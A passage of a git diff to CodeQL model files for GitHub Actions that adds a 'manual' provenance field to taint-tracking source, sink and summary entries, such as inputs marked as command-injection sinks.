+- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 6 +-- .../manusa_actions-setup-minikube.model.yml | 8 ++-- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 14 +++---- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 4 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 22 +++++------ ql/lib/ext/msys2_setup-msys2.model.yml | 4 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 4 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +-- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 6 +-- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 6 +-- .../preactjs_compressed-size-action.model.yml | 4 +- ql/lib/ext/py-actions_flake8.model.yml | 14 +++---- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 8 ++-- ...vecircus_android-emulator-runner.model.yml | 38 +++++++++---------- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 16 ++++---- .../ext/renovatebot_github-action.model.yml | 10 ++--- .../ext/roots_issue-closer-action.model.yml | 4 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 10 ++--- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 8 ++-- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +-- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++++++--------- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 ++-- ...ss_conventional-changelog-action.model.yml | 20 +++++----- .../tryghost_action-deploy-theme.model.yml | 4 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 8 ++-- .../ext/wearerequired_lint-action.model.yml | 6 +-- ql/lib/ext/webfactory_ssh-agent.model.yml | 6 +-- .../xt0rted_slash-command-action.model.yml | 4 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 8 ++-- ql/lib/ext/zaproxy_action-full-scan.model.yml | 8 ++-- 135 files changed, 359 insertions(+), 359 deletions(-) diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index e3d97adf69d4..67455900ec36 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 4ff387b1c5ac..65952bccb35a 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index cd409f38b59d..9b36680af8f0 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script", "*", "input.script", "code-injection"] + - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index aabd5a3ce369..63e99abd4d35 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index ad65775e58d1..41b67c2a625d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 638ff4497353..f2b8c8549a90 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index c632a3a1ff25..7cb2e10e9267 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] - - ["anchore/sbom-action", "*", "input.format", "command-injection"] - - ["anchore/sbom-action", "*", "input.path", "command-injection"] - - ["anchore/sbom-action", "*", "input.file", "command-injection"] - - ["anchore/sbom-action", "*", "input.image", "command-injection"] + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 26e5adea505b..83f09bc6bde5 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] + - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index 2903888a7318..bdd8a8f77c9b 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 5ecd36f0926f..7e5f5c9ee6a4 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index b81f5c17ca22..8daa9a9c2b33 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 21dcd22c8b7f..80502e487b83 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file + - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 5ab9fee16679..2a26d31feac7 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index a6e1364d218c..82e81f558166 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index cfdbb0b825fb..58554eb3f612 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index 26b3a1fd3df6..ca99210b4c2a 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 236eade34a64..1563d95b0b14 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] - - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index c0e11c8201f4..2bb6000355d6 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] + - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 2841f406bdaa..b0c3419abe93 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index aa060de610d9..cbe593690e44 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 2d8932d87fb5..f29355d48827 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 7d5f699a0e98..8463ed9577b4 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] - - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index aeda79986314..f20a877c3d28 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index 38b18cf6cac8..e0fe96ff9152 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] - - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 2e4291eb480c..a7489b686882 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] - - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 3be7669275c6..c0a18c36465f 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["changesets/action", "*", "input.publish", "command-injection"] - - ["changesets/action", "*", "input.version", "command-injection"] + - ["changesets/action", "*", "input.publish", "command-injection", "manual"] + - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index cb0870b4883f..79ed7a80437c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] - - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index bfb45dddb668..550b5b854ed7 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index 30e59e91d60c..bbe886112595 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index f3b021d226b9..83b3bc3520df 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 60e35e66a4de..3b0642fece44 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index 25df02dacaa6..db55d3c6f3a8 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] - - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] - - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 0aaa1b0722ae..21688675a2ed 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 324171f3c4b0..462268636874 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] - - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index cc5c311eea73..afe3e82ca1f6 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", 